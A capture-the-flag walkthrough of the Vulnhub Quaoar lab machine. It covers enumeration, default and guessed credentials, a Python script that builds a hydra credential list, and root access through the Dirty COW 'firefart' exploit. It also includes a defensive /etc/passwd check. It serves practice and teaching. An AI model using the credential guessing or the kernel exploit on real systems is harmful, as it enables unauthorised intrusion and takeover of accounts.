Vulnhub Quaoar Walkthrough


Below you’ll find my results from the Vulnhub Quaoar machine, found here. There are a few ways to root this…here’s what I did initially.

First – Nmap discovery: a SYN scan with version detection across all 65535 TCP ports, -p- (yes, I cheated and got the IP from my DHCP server…)

nmap -sS -sV 192.168.10.152 -p-

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-28 23:37 EDT

Nmap scan report for 192.168.10.152
Host is up (0.030s latency).
Not shown: 65526 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We see 80 open, so let’s check for low-hanging fruit here…

root@kali:~# curl http://192.168.10.152/robots.txt
Disallow: Hackers
Allow: /wordpress/
   ____                              
#  /___ \_   _  __ _  ___   __ _ _ __ 
# //  / / | | |/ _` |/ _ \ / _` | '__|
#/ \_/ /| |_| | (_| | (_) | (_| | |   
#\___,_\ \__,_|\__,_|\___/ \__,_|_|

OK…there may be a WordPress install; let’s check it out.

root@kali:~# curl http://192.168.10.152/wordpress/ | html2text 
[...snip...]
****** Quaoar ******
Search
 Primary Menu Skip_to_content
    * Sample_Page
 Search for: [Unknown INPUT type]  [Search]

****** What_is_Quaoar? ******
October_22,_2016 admin
Leave_a_comment
https://fr.wikipedia.org/wiki/%2850000%29_Quaoar

****** Hello_world! ******
October_12,_2016 admin
Leave_a_comment
Welcome to WordPress. This is your first post. Edit or delete it, then start
blogging!
***** Just another WordPress site *****
 Search for: [Unknown INPUT type]  [Search]
****** Recent Posts ******
    * What_is_Quaoar?
    * Hello_world!
****** Recent Comments ******
****** Archives ******
    * October_2016
****** Categories ******
    * Uncategorized
****** Meta ******
    * Log_in
    * Entries_RSS
    * Comments_RSS
    * WordPress.org
Proudly_powered_by_WordPress

Go to …/wp-admin and try the obvious combinations of usernames and passwords, and lo and behold, we’re successful. (admin/admin)

(screenshot: WordPress admin access)

Let’s make a note of that for now and check a few other things. Since we saw 139 and 445 open, let’s see what SMB gives up.

root@kali:~# enum4linux 192.168.10.152
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 29 08:53:32 2017

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.10.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating Workgroup/Domain on 192.168.10.152    |
 ====================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================== 
|    Nbtstat Information for 192.168.10.152    |
 ============================================== 
Looking up status of 192.168.10.152
  QUAOAR          <00> -         B <ACTIVE>  Workstation Service
  QUAOAR          <03> -         B <ACTIVE>  Messenger Service
  QUAOAR          <20> -         B <ACTIVE>  File Server Service
  ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
  WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
  WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
  WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name

  MAC Address = 00-00-00-00-00-00

 ======================================= 
|    Session Check on 192.168.10.152    |
 ======================================= 
[+] Server 192.168.10.152 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.10.152    |
 ============================================= 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.10.152    |
 ======================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.10.152 from smbclient: 
[+] Got OS info for 192.168.10.152 from srvinfo:
  QUAOAR         Wk Sv PrQ Unx NT SNT Quaoar server (Samba, Ubuntu)
  platform_id     :	500
  os version      :	4.9
  server type     :	0x809a03

 =============================== 
|    Users on 192.168.10.152    |
 =============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: 
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: viper	Name: viper	Desc: 
index: 0x3 RID: 0x3ea acb: 0x00000010 Account: wpadmin	Name: 	Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: root	Name: root	Desc: 

user:[nobody] rid:[0x1f5]
user:[viper] rid:[0x3e8]
user:[wpadmin] rid:[0x3ea]
user:[root] rid:[0x3e9]

[...snip...]

Interesting…there’s a local user “wpadmin”. Note that enum4linux pulled this list over an anonymous (null) SMB session, so no credentials were needed to learn the local account names. Since the WP install was using admin/admin, let’s see if wpadmin might be using something similar. (wpadmin/wpadmin)
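
Turning that enumeration into a guess list is the step that joins the two findings above (default WordPress credentials, then a username-as-password guess against an account name learned over SMB). The script below is an added example for this walkthrough, not code from the original post or from enum4linux: it parses the two user-list formats enum4linux prints, drops RIDs below 1000 (an assumption: those are well-known or system mappings such as Samba’s nobody), and emits login:password candidates in the order tried on this box, username-as-password first, then any password already recovered elsewhere on the host (admin, from WordPress). The sample input is the user block from the run above; the candidate rules are this example’s own heuristics.

```python
"""Build a credential-guessing list from enum4linux user enumeration.

Added example for this walkthrough; not part of the original post or of
enum4linux. SAMPLE_ENUM4LINUX is the "Users on ..." block from the run above;
MIN_USER_RID and the candidate rules are this example's assumptions.
"""
import re

# Constructed from the "Users on 192.168.10.152" section of the enum4linux run.
SAMPLE_ENUM4LINUX = """\
 =============================== 
|    Users on 192.168.10.152    |
 =============================== 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody\tName: nobody\tDesc: 
index: 0x2 RID: 0x3e8 acb: 0x00000010 Account: viper\tName: viper\tDesc: 
index: 0x3 RID: 0x3ea acb: 0x00000010 Account: wpadmin\tName: \tDesc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: root\tName: root\tDesc: 

user:[nobody] rid:[0x1f5]
user:[viper] rid:[0x3e8]
user:[wpadmin] rid:[0x3ea]
user:[root] rid:[0x3e9]
"""

# enum4linux prints the same accounts twice, in two layouts; accept both.
USER_RE = re.compile(r"^user:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
INDEX_RE = re.compile(r"^index: \S+ RID: (?P<rid>0x[0-9a-fA-F]+) .*?Account: (?P<name>\S+)")

# Assumption: RIDs below 1000 are well-known/system mappings (here Samba's
# "nobody"), not accounts that are likely to have a login password.
MIN_USER_RID = 1000


def parse_users(text):
    """Return {username: rid} from enum4linux output, de-duplicated across both layouts."""
    users = {}
    for line in text.splitlines():
        m = USER_RE.match(line) or INDEX_RE.match(line)
        if m:
            users[m.group("name")] = int(m.group("rid"), 16)
    return users


def candidate_logins(users, known_passwords=(), min_rid=MIN_USER_RID):
    """Yield (user, password) pairs in the order worth trying first.

    Heuristics (this example's, mirroring the guess that worked on the box):
      1. username as password                         -> wpadmin/wpadmin
      2. passwords already recovered elsewhere on the host -> admin (from WordPress)
    Accounts are visited in RID order so the oldest local users come first.
    """
    seen = set()
    for name, rid in sorted(users.items(), key=lambda kv: kv[1]):
        if rid < min_rid:
            continue
        for pw in (name, *known_passwords):
            if (name, pw) not in seen:
                seen.add((name, pw))
                yield name, pw


def hydra_colon_file(pairs):
    """Format pairs as 'login:password' lines, the layout hydra's -C option reads."""
    return "\n".join(f"{u}:{p}" for u, p in pairs) + "\n"


if __name__ == "__main__":
    found = parse_users(SAMPLE_ENUM4LINUX)
    print(hydra_colon_file(candidate_logins(found, known_passwords=["admin"])), end="")
```

The output is in the colon-separated form hydra’s -C option consumes, so `python3 guesslist.py > creds.txt && hydra -C creds.txt ssh://192.168.10.152` tries every pair against SSH; the same list is worth pointing at the Dovecot POP3/IMAP services from the nmap scan, since Dovecot is commonly configured to authenticate against the system accounts.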

root@kali:~# ssh wpadmin@192.168.10.152
wpadmin@192.168.10.152's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Oct 29 08:58:06 EDT 2017
[...snip...]

Success! Let’s check some basics…and find our flag.

$ echo $SHELL
/bin/sh
$ pwd
/home/wpadmin
$ ls -lahS
total 12K
drwxr-xr-x 2 root root    4.0K Oct 22  2016 .
drwxr-xr-x 3 root root    4.0K Oct 24  2016 ..
-rw-r--r-- 1 wpadmin  wpadmin   33 Oct 22  2016 flag.txt
$ cat flag.txt
2bafe61f03117ac66a73c3c514de796e

Now here’s where you could go a couple of different directions. For better or worse, I went for the quick and easy win, and it worked.

Check the kernel version…

$ uname -a
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux

With the OSCP labs still fresh in my mind, I know there are several vulnerabilities that affect this kernel. One of them is “dirtycow” (CVE-2016-5195, a race in the kernel’s copy-on-write handling that lets an unprivileged user write to read-only files); “firefart” is the name of the widely used dirty.c proof-of-concept for it, which uses that write to drop a new UID 0 user into /etc/passwd. Not the best option if you’re going for stealth, of course, but in this case we’re not focused on that.

On the target we check whether gcc is installed; it is not. So we compile the exploit on the Kali machine instead and, since we already have SSH access, scp the binary over. The target runs a 32-bit (i686) kernel, so on a 64-bit Kali the build needs -m32; -pthread is for the racing threads the exploit spawns and -lcrypt for the crypt(3) call that produces the password hash in the new passwd line. One caveat: the result is linked dynamically against Kali’s libc, which is far newer than the one shipped with Ubuntu 12.04, so if the binary refuses to start with a “GLIBC_x.y not found” error, rebuild it with -static. Note – /home/wpadmin is owned by root and the wpadmin user has no write access to it…so we save the exploit to /tmp.

[TARGET]
$ gcc -v
-sh: 15: gcc: not found

[KALI]
root@kali:~# gcc -pthread dirty.c -o dirty -lcrypt -m32
root@kali:~# scp dirty wpadmin@192.168.10.152:/tmp
wpadmin@192.168.10.152's password: 
dirty                                                                                                   100%   12KB   2.4MB/s   00:00 

On our target, we make the file executable and run it.

$ chmod +x dirty
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash

mmap: b77bb000

madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'firefart'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

Then we can log in to the target using our newly created “firefart” account.

root@kali:~# ssh firefart@192.168.10.152
firefart@192.168.10.152's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Oct 29 09:23:56 EDT 2017

[...snip...]
firefart@Quaoar:~# cd /root
firefart@Quaoar:~# ls
flag.txt vmware-tools-distrib
firefart@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb
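
Before restoring /etc/passwd it is worth knowing exactly what the run left behind, because that footprint is what a defender would hunt for. The check below is an added example for this walkthrough, not code from the original post or from the dirty.c author: it parses passwd(5) lines and flags the three tells visible in the exploit output above, a second UID 0 account, a crypt(3) hash sitting in /etc/passwd instead of /etc/shadow, and a home directory of /root on a non-root account. The sample file is constructed from the usernames enumerated earlier plus the exact “Complete line” the exploit printed.

```python
"""Flag the /etc/passwd footprint left by the dirty.c run above.

Added example for this walkthrough; not from the original post or from the
exploit's author. SAMPLE_PASSWD is constructed: plausible entries for the
accounts enumerated earlier plus the exact "Complete line:" the exploit printed.
"""
import sys

# Constructed sample input; the last line is copied from the exploit output.
# "fik57D3GJz/tk" is a 13-character traditional DES crypt(3) hash (2-char salt
# + 11 chars), stored in the password field instead of an "x" pointing to shadow.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
viper:x:1000:1000:viper,,,:/home/viper:/bin/bash
wpadmin:x:1001:1001::/home/wpadmin:/bin/sh
firefart:fik57D3GJz/tk:0:0:pwned:/root:/bin/bash
"""

# Password-field values that mean "the real hash lives in /etc/shadow" or
# "the account is locked". Anything else is a hash stored directly in passwd,
# which every local user can read and which is exactly what dirty.c writes.
SHADOWED = {"x", "*", "!", ""}


def parse_passwd(text):
    """Yield one dict per well-formed passwd(5) line; skip blanks, comments and junk."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue                      # NIS '+' entries or corruption: ignore
        name, pw, uid, gid, gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue
        yield {"line": lineno, "name": name, "pw": pw, "uid": int(uid),
               "gid": int(gid), "gecos": gecos, "home": home, "shell": shell}


def find_rogue_entries(text):
    """Return (reason, entry) pairs for every line matching the exploit's footprint."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(("uid 0 account that is not root", e))
        if e["pw"] not in SHADOWED:
            findings.append(("password hash stored in /etc/passwd, not /etc/shadow", e))
        if e["home"] == "/root" and e["name"] != "root":
            findings.append(("non-root account homed in /root", e))
    return findings


def main(argv):
    """Check the file named in argv[1], or the constructed sample when none is given."""
    if len(argv) > 1:
        with open(argv[1]) as fh:
            text = fh.read()
    else:
        text = SAMPLE_PASSWD
    findings = find_rogue_entries(text)
    for reason, e in findings:
        print(f"line {e['line']}: {reason}: {e['name']} (uid {e['uid']}, home {e['home']})")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 check_passwd.py /etc/passwd` on the target, or on a copy pulled during incident response; a non-zero exit means something matched. Then follow the exploit’s own reminder, mv /tmp/passwd.bak /etc/passwd, and delete /tmp/dirty as well, since the binary otherwise stays behind as evidence of how the box was rooted.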

Admittedly, I did not find the 3rd flag. However, there is a good write-up here: http://www.chokepoint.net/2017/03/hackfest2016-quaoar-vulnhub-walk-through.html which also provides some good advice on why to check cron jobs…in this case, because the 3rd flag was there!

Nicely done, k0ncepts.